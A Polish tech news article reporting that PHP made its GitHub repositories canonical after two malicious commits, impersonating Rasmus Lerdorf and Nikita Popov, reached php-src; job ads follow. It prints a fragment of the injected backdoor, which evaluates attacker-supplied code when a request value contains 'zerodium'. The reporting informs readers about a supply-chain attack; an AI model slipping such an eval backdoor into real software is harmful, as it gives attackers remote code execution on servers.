30.03.20213 min

Mateusz LewandowskiContent Specialist

Twórcy PHP zdecydowali o całkowitym przejściu na GitHuba

Twórcy PHP zdecydowali się oficjalnie przejść na GitHuba. Do tej decyzji popchnął ich nieprzyjemny incydent.

Twórcy PHP zdecydowali o całkowitym przejściu na GitHuba

Twórcy PHP zdecydowali ostatnio, że ich repozytoria na GitHubie, które funkcjonowały do tej pory jako kopie, od teraz będą kanoniczne. Decyzja ta jest następstwem incydentu, który polegał na wysłaniu dwóch złośliwych commitów do repozytorium php-src. Ktoś podszył się przy tym pod Rasmusa Lerdorfa i Nikitę Popowa, dwóch czołowych developerów PHP. Co więcej, wszystko wskazuje na to, że ataku dokonano na cały serwer git.php.net, a nie na pojedyncze konto git.

Twórcy doszli więc do wniosku, że utrzymywanie swojej własnej infrastruktury git tworzy niepotrzebne zagrożenie dla bezpieczeństwa. Zamiast więc utrzymywać wcześniej wspomniany serwer, zdecydowano się na przeniesienie całego PHP na GitHuba - oznacza to, że wszystkie zmiany będą przesyłane właśnie tam, a nie do git.php.net.

Wcześniej dostęp do repozytoriów gwarantował system stworzony wewnątrz PHP o nazwie Karma. Od teraz jednak trzeba będzie być częścią organizacji PHP na GitHubie. Jeśli ktoś nie ma dostępu do jakiegoś repozytorium, to Nikita Popov oferuje pomoc w tej sprawie i zachęca do kontaktu na jego maila - nikic@php.net

Warto tutaj również wspomnieć, że przynależność do organizacji PHP na GitHubie wymaga zezwolenia na uwierzytelnienie wielopoziomowe.

Co do samego ataku, to twórcy badają jeszcze sprawę i nadal niewiele wiadomo. Spójrzmy jednak na niektóre fakty i zobaczmy, co dokładnie mogło się stać.


Atak na PHP.net

Z tego, co czytamy tutaj, wynikać może, że cała sprawa wyszła na jaw w momencie, gdy Markus Staab, Jake Birchallf, Michael Voříšek i inni zaczęli szczegółowo badać podejrzane commity, które dokonano 27 marca. Pierwszy commit miał rzekomo poprawiać pewną literówkę - dokonano go przy użyciu konta Rasmusa Lerdorfa. Drugi commit miał z kolei na celu odwrócenie poprzedniej poprawki - dokonano go, podszywając się pod Nikitę Popowa.

Oba commity dodawały poniższy kod:

onvert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");


Czy była to próba dokonania czegoś dużego? HD Moore, współzałożyciel oraz CEO platformy Rumble do wykrywania urządzeń sieciowych, mówi, że można przypuszczać, iż ktoś po prostu chciał pochwalić się tym, że udało mu się uzyskać nieautoryzowany dostęp do serwera PHP Git. Sam atak mógł być więc tylko zwykłym żartem. Grunt, że sytuacja dała twórcom PHP do myślenia! 

A czym jest Zerodium? To firma, która nabywa exploity od przeróżnych badaczy i sprzedaje je organizacjom rządowym, aby te mogły ich używać w swoich śledztwach lub innych działaniach. Chaouki Bekrar, CEO tej organizacji powiedział na Twitterze, że jego firma nie miała nic wspólnego z powyższymi commitami.

Oto jego tweet:


Podsumowanie

Z PHP korzysta obecnie około 80% wszystkich stron internetowych - możemy o tym przeczytać tutaj. Nie ma jednak żadnych doniesień, aby jakakolwiek z nich miała złośliwy kod. 

Jeśli chodzi zaś o samo przejście na GitHuba, to to samo od najnowszej wersji robi właśnie Java, jednakże z trochę innych pobudek. Niemniej jednak można sobie zadać następujące pytanie: czy GitHub stanie się nowym standardem, jeśli chodzi o utrzymywanie i rozwój języków programowania? 

<p>Loading...</p>

Powiązane artykuły

Dziel się wiedzą ze 160 tysiącami naszych czytelników

Zostań autorem Readme

Accenture Polska

PHP/Magento Developer

medium

Brak widełek

Kontrakt B2BUmowa o pracę

Praca zdalna 100%

Ważna do 27.02.2022

Bardzo dobrze
PHPGIT
Dobrze
Magento 2SOAP/REST HTML/CSS
Początkujący
JSONJavaScript jQuery

Amsterdam Standard Sp. z o.o.

PHP Developer

medium

10 000 - 16 000 PLN

Kontrakt B2BUmowa o pracę

Praca zdalna 100%

Ważna do 13.03.2022

Bardzo dobrze
PHPSymfony
Dobrze
JavaScriptTypeScriptVueJS

Mikronika

PHP Tech Lead

senior

Brak widełek

Kontrakt B2BUmowa o pracę

Praca zdalna 100%

Ważna do 25.02.2022

Bardzo dobrze
PHPSQLMySQL

Polcode Sp. z o.o.

PHP Full Stack Developer

medium

7 500 - 16 000 PLN

Kontrakt B2BUmowa o pracę

Praca zdalna 100%

Ważna do 24.02.2022

Bardzo dobrze
PHP
Dobrze
Symfony / LaravelReact / Vue / AngularJavaScript

Miinto

Tech Manager - PHP (remote)

senior

20 000 - 28 000 PLN

Kontrakt B2BUmowa o pracę

Praca zdalna 100%

Ważna do 11.03.2022

Dobrze
PHP

Miinto

Senior Backend Developer - PHP (remote)

senior

20 000 - 25 000 PLN

Kontrakt B2BUmowa o pracę

Praca zdalna 100%

Ważna do 11.03.2022

Dobrze
PHP

nazwa.pl

Webmaster

junior

Brak widełek

Kontrakt B2BUmowa o pracę

Krakow

Praca zdalna 100%

Ważna do 23.02.2022

Dobrze
PHPJavaScriptWordpress
Początkujący
CSSPrestaShopJoomla

Polcode Sp. z o.o.

Magento Developer

medium

11 000 - 17 000 PLN

Kontrakt B2BUmowa o pracę

Praca zdalna 100%

Ważna do 23.02.2022

Bardzo dobrze
MagentoPHPMySQL
Początkujący
JavaScript

eSky.pl S.A.

FullStack Developer (PHP, Angular)

medium

13 000 - 17 000 PLN

Kontrakt B2B

Katowice

Praca zdalna 100%

Ważna do 17.02.2022

Dobrze
PHPJavaScriptES6

nazwa.pl

Programista PHP

medium

Brak widełek

Kontrakt B2BUmowa o pracę

Krakow

Ważna do 17.02.2022

Bardzo dobrze
CRMPHP
Dobrze
HTML5CSS3JavaScript
Początkujący
CMSVagrantAnsible